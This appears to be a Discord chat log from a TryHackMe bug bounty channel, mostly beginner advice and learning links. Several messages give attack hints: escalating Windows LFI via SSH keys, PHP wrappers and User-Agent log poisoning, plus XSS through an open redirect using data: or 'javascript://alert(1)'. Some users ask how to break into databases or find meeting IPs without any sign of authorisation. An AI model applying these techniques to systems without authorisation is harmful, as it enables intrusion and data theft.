!docs free-path

#bot-commands

.

Can anyone take me in their team

I know more than basics of the bug bounty looking for a team to improve my skills

!docs student

Is there any room for bug bounty in tryhackme

?

There's the web path

Apparently TryHackMe has an admin portal at <admin.tryhackme.com> wonder if anyone's ever had a look at it for the bug bounty

That is just so believable that I wouldn't even click on it.

it's where I found the key to #advanced-advanced-general

https://www.youtube.com/watch?v=SBCpfYFs610

!docs levels

#bot-commands

can somebody please tell me how i can buy a Sub...it says your card does not support

Hey guys can anyone help me with an LFI on windows ?

I'm hunting for a bug and I can read files from the Windows server like :

C:\Windows\System32\drivers\etc\hosts

But how can use this to exploit further ?

Well u need to look for ssh keys if u want to get RCE,,and if u can't then report this bug (reading system file is no joke)

Any ideas where they are stored ?

Like in linux it's ~/.ssh/id_rsa

Can't seem to query %Appdata%

@wary moon hi, please keep video content for THM in #thm-community-media

Bugcrowd is dead

why do you think that?

Just because there is less transparency. In handling of reports

Not rlly a lot of people still use it

Use php wrappers (if the backend is php) in order to read backend php source code, from there you can find database creds.

Or if you are lucky enough then you can access the apache or any other service log and then try to inject any arbitrary code in user controlled input such as User-Agent, or any header

You can google it, that how to escalate lfi to rce using log poisoning

hi guys

Hey

i want help in bugbounty

What help do you need

start a new journey in this field

I recommend checking out TryHackMe.com webpath and Portswigger academy

ohk

thank you 😇

!docs bug-bounty

!docs levels

!docs verify

!docs bug-bounty

Those who r using bot commands here hope they read channel name correctly

#bot-commands pls

My apologize ... but seems that there might be some problem with the Site's Certificate - keep getting this error: "Did Not Connect: Potential Security Issue"

hi

what skills need for bug bounty ??

Where to start ؟؟

#general message This message from #general is a good guideline from start to end 🙂

thanks

It's good even if you forget the fourth point 😄

Is there an easy way to fuzz parameters in a file containing URLs? So, if you have a text file with URLs containing parameters, is there an easy way to use that file to fuzz every parameter for each URL in that file?

Not too sure if there’s a tool that does it, but is a great scripting/programming challenge

Just do it in a bash for loop

Could even do that backgrounded for speed, technically. Not sure how many URLs you're looking at

Thanks @hybrid orchid! Yeah, so I have been playing with it and figured this out:

sed -r '/^\=/!s/=.*$/=somevalue/g' file-containing-urls.txt

This is working, however, it's only replacing the first = and not all =

Gave +1 Rep to @hybrid orchid

Or, in other words, only the last parameter and not any of the other parameters. Thanks again, @hybrid orchid

My problem with the for loop is the same problem I'm having. I can't replace all characters after every =. Eh, I'll keep stabbing away at it

is it normal if i can see media of website in admin/uploaded/images ??

i can access staff images and resumes

If it’s sensitive data, such as emails, names, age, etc. Then no that’s probably not normal.

Can any suggest me hw to acces into a website dbs

Becuz when i try to use sql on a website it shows xxs protection 1; mode= block

N Messed up hw to bypass this

Is there any bug bounty team ?

i want to join

Hello, can someone please guide me to get into Bug Hunting? Thank you in advance!

Check pins of this channel,learn javascript,sql,Do THM web app path then portswigger ,hacker101 ctfs,read bug reports and try hunting for bugs.

Thank you, already started with THM.

Gave +1 Rep to @past hatch

iam trying to deploy owasp juice shop room's machine but it says i have already machine running in this room please terminate it....but there is no option to terminate it...what should i do

Guy's anyone here who want to do bug Bounty in collaboration anyone interested

@remote wadi a double bug bounty?

Together

let's go

Dm me

lets do it

Hey @lament adder let’s keep it English please

hey

hello

Hey

is there anyone who wants to team up for bug bounty can dm me

@knotty timber me I guess 🤔

Yeah

Yes

If anyone is willing can i join .? I'm new to bug bounty and just wanna know the parcs !

pracs*

Any bug bounty hunters are alive

I mean ping me

maybe ask the question

I meant ask here not dm me lol read #rules :)

I know but its a repeated question ppl may get bored

😦

@untold scroll

Can you please show me one of your work. so that i can understand just for clarity

How it's look like

I haven't disclosed any of my reports but in case u need this might help u https://github.com/devanshbatham/Awesome-Bugbounty-Writeups

Ohhkk

Thank you so much

I am preparing a mindmap, can anyone help me with this

#infosec-general maybe ask there

Ok

i need to learn to code

#programming probably be a better place to ask

https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html

Is anyone willing to teach a guy with a basic knowledge of webapp pentesting about bug hunting?
Ps: that guy is me.

Tryhackme can, #start-here

@feral bronze ^

Thank You @past hatch. I am already onto it. And completing rooms in it for the past 50 days.

Gave +1 Rep to @past hatch

also verify your acc

!docs verify

click that link

Portswigger academy also can

Hi chat
I found algolia App_Secret_Key , App_ID, App_Index_name and some other configuration leaked on GitHub repo ( the repo belongs to dev works on the company)
Should I report it?

Well app_secret_key is something here,see is there any more sensitive info u can get which shouldnt be available and if u do find it then submit the report.

https://www.bugbountyhunting.com/

Big vouch for that platform

Well app_secret_key is something here,see is there any more sensitive info u can get which shouldnt be available and if u do find it then submit the report.
@past hatch Thx man
I found Algolia API key and I submit it

Gave +1 Rep to @past hatch

Gl with bounty

Still no respond from the triage team
Just I am waiting

Also I checked the Keyhacks repo I found the Algolia API key with the exploit
So I reported it and now I am waiting

Well first response totally depends on that pragram.For some it may be 24hr ,for some even 3days.

Well first response totally depends on that pragram.For some it may be 24hr ,for some even 3days.
@past hatch yeah I know hope it triaged soon and be valid one 💥

-clean 100 633772744483274793

clean 100 633772744483274793

Worth a shot 🤷‍♂️

I found a site (that I'm a user of) that sends password resets in plain text via email. Seems like that's a bad idea....

hi

Love new members though we do, you don't have to say that in every chat :)

hello

anyone know how i can get into bug bounty like where to start and what tools and how to use them

bug bounty is mainly web app testing, so focus on learning and understanding the owasp top 10 (https://owasp.org/www-project-top-ten/), portswigger academy (https://portswigger.net/web-security) has some really good labs for learning this, though assumes you have burp pro. This can be circumvented by using ZAP I believe.
I'd also strongly recommend you check out the OWASP Web Security Testing Guide (https://owasp.org/www-project-web-security-testing-guide/). Though this is more aimed at web application pentesting, it holds some real treasures to improve on bug bounty.

Once you have an understanding of those check out hackerone hacktivity as they have a massive amount of disclosed bugs that people found in the wild and is an incredible resource to learn. They also have a CTF platform with some really great and realistic challenges

TLDR breakdown for those who may see this after you:

Tools:

• Burp Suite Community / Pro (Don't sweat if you don't have pro)
• FFUF/ Any fuzzing tool (This can be used to fuzz for extensions for loose files on a server)
• Zap (If not using burp)

Practice Sites:

• Portswigger Academy (https://portswigger.net/web-security)
• THM OWASP top 10 (https://tryhackme.com/room/owasptop10)
• OWASP WSTG (https://owasp.org/www-project-web-security-testing-guide/)
• THM OWASP Juice Shop (https://tryhackme.com/room/owaspjuiceshop)
• Hackerone Hacktivity (https://hackerone.com/hacktivity)
• Hacker101 Training CTF (https://ctf.hacker101.com/)

Closing out, don't go into bug bounty expecting instant results! It takes an insane amount of time to get your first bounty but it will eventually happen. Go into it to learn and I promise you'll learn more than some CTFs

@native token thank you, ill look at them as soon as possible

Gave +1 Rep to @native token

req for pin

Will create a more indepth post as there's a bunch I could add to that post as well

I was pentesting a website and i noticed something, changing the host header to for ex: bing.com, reflects in the source code of the website... In base hrf and in many other lines too... But it does not seem to redirect to bing... Any idea what can i do??

I tried adding some other headers too... But it gives an error

hZJhSwEIb/Ssn3NW1XpwvbYG4VBiqGmyTmrtO56/32jmZXxQC/PED9tVw/O7WI6 does anyone know waht kind of encryption is this?

like, it has multiple slashes in it, I see it often in some websites

the host header is telling burp where to fire at

so if you're accessing

/testdirectory
host: google.com

it's gunna go to google.com/testdirectory

if you change host it will change the host

I'd probably guess going off of what you've put that changing the host header isn't really gunna do much in this instance unless you can get some sort of injection vuln going e.g xss

But even then it's only a self-xss unless it persists in some sort of logs

Tbh most header attack r useless bz of highly user interaction and no security impact,well if u can get password link on ur controlled domain(by modifing host header)using forget password functionality will lead to full account takeover which is special case

I see, thanks for the information @past hatch @native token ...i think i know what i need to do

Gave +1 Rep to @past hatch

How to start bug bounty

Anyone can please tell me. I am new in this field

There are some great resources in the pins and if you scroll up a bit you will see Optional mentioned a good way to get into them

Hey guys, any ideas on how to escalate an open Redirect ?

There's this website vuln.com/?page=http://bad.com

This opens bad.com

I tried javascript://alert(1) to pop an xss

But didn't work

Any ideas ?

It's a Django website though

You could try xss via data:// tags

a lot of open redirects tend to be different from each other depending on the implementation, so it's best to fiddle around and see if you can find any variation that may work for your case

How to find the ip address of the google meeting in which we are connected

@prime cipher ^ was spammed across multiple channels

Hello guys, I'm a newbie leaner. Trying to figure out how things work in bug bounty. I have a question, i was trying to find xss in a site. I achieved to pop up an alert on the screen. But i happened when i edited the "response of the request in burp suite". I guess this is not a xss vulnerability. Is there anything can evaluate as a security leak ? Is it possible to create a risk just editing the response of requests ?

If you are editing responses you get from the website, it's not an issue with the website.

In ur case its consider self xss which aint worth reporting,yes editing response can help like bypassing 2FAs, bypassing client side restrictions or logic flaws.

@past hatch Thank you for the answer.

Gave +1 Rep to @past hatch

Use dnsmap from Kali Linux

Open a terminal And type:
dnsmap google.com

And u got all IP of Google try it

Anyone a real bug bounty hunter that would like to take me under their wing? Warning - i will be asking you the most basic fundamentals that might be the most annoying to you. Thank you in advance. Appreciate this much

The basic fundamentals can be found with research, also bug bounty can be competitive can be hard to find a mentor that will take you under their wing

Worth a shot

Thank u

I mean there may be someone but I think a lot will say learn by yourself, there's a great site that's realistic that's made by one of the THM staff Adamtlangley

https://ctfchallenge.com/

I see what you're saying

https://bugbountyhunter.com/

Oh man ! that 's awesome !!!

That site is probably the best place to learn the types of vulns you'll find

Optional i actually emailed tzeano before and they aren't accepting anymore members 😦

Meant to be reopening soon™️

Thank uu

One thing you'll need to work on though is understanding the basics before you consider bug bounty.

gunna drop this back down here as it's quite useful especially for the OWASP stuff

Love it! Love how you said "we will eventually find a bug" XD that gives me motive man thank you

Okay let's get this show on the road XD

I want to hack this website https://hackerone.com/sifchain?type=team

You'd be hard pushed considering that's a source code review program

Okay next program 😅 🤩

Ah much easier one that isn't about coders lol

Have you done any of the hacker101 CTF yet?

No

Just THM

https://ctf.hacker101.com/

I did get started on the cv2 ones

You can do challenges on here that are based on realistic vulns and gain private invites every 26 points

Are you freaking kidding me !!! I thought i was hallucinating

Note that if you receive a private invite and you don't like the look of the scope, you can skip it 3 times as long as you remember to fill out the questionnaire that they attach to the skip button

I was planning to stick with hacker1 at first but then i thought it was a bit too hard and saw that THM was a much better platform for learning but I also really like hacker1.

THM is a much better way into it

I'll be sure to keep this in mind

going from 0 knowledge straight into bounty is a sure way to never find a bug 😂

Invites also only go out once a day. That being 8am GMT roughly

So question : can i start to apply what i learned from Juice shop and OWASP rooms here on real life bug bounties ??

Yup pretty much

No freaking way!!!!!

the most common bugs you'll find during bug bounty are OWASP top 10

THAT IS AMAZNG

Though they won't be as easy to find as the ones in those boxes

Dude that still gives me so much motive !!

If you learn well from videos, I can't recommend enough InsiderPHD (https://www.youtube.com/user/RapidBug). Even now I go back to her videos to check on stuff I've done a few times

that's why i'm finishing up the 'Complete Begginers Path'. i was gonna go into Hack The Box next but i think Hacker1 is my next bet.

Don't write off any platform

Ahhh yes i know of 🙂

H1 is in a different league to THM/HTB

it isn't a CTF

Ohhh that makes complete sense .

The main problem a lot of people have when going from THM/HTB is they go into a platform thinking it's got a vuln

I see

which is a blessing and a curse, as on one hand you'll look at things from every possible angle until you find something. But if you don't find something it can be brutal on mental health and just cause you to doubt yourself

Just like John Hammond said...it's more of a way to go and lift weights 🤪

see how much you can lift lol

as oppose to hacker1 is the real big boy

There's an insane difference between prod systems that have had pentests and ctf boxes that's for sure

mainly as you're playing a treasure hunt with the pentesting team in the hope they missed something

Well just the fact that you said that i can start to apply what i've learned from THM OWASP rooms and similar sort gives me so much hope

But i get what you're saying,, i can't write any platforms off and learn everywhere i can

I'm excited already XDD

Exactly, going off of experience. as a beginner/middle ground user, you'll always learn more from thm/htb as they are designed to teach

shits crazy man

Agreed !

bb is kinda that place you go when you decide you hate yourself and want to suffer for a few hours

Ha

Send me the invite please

So let's say i want to have at it with exodus.com a crypto currency website

do I just read what's in scope and start hackin away ?

https://hackerone.com/exodus?type=team

Obviously do my recon first

and OSINT

Essentially read and understand the program page so everything

then start enumerating

ok on it !!!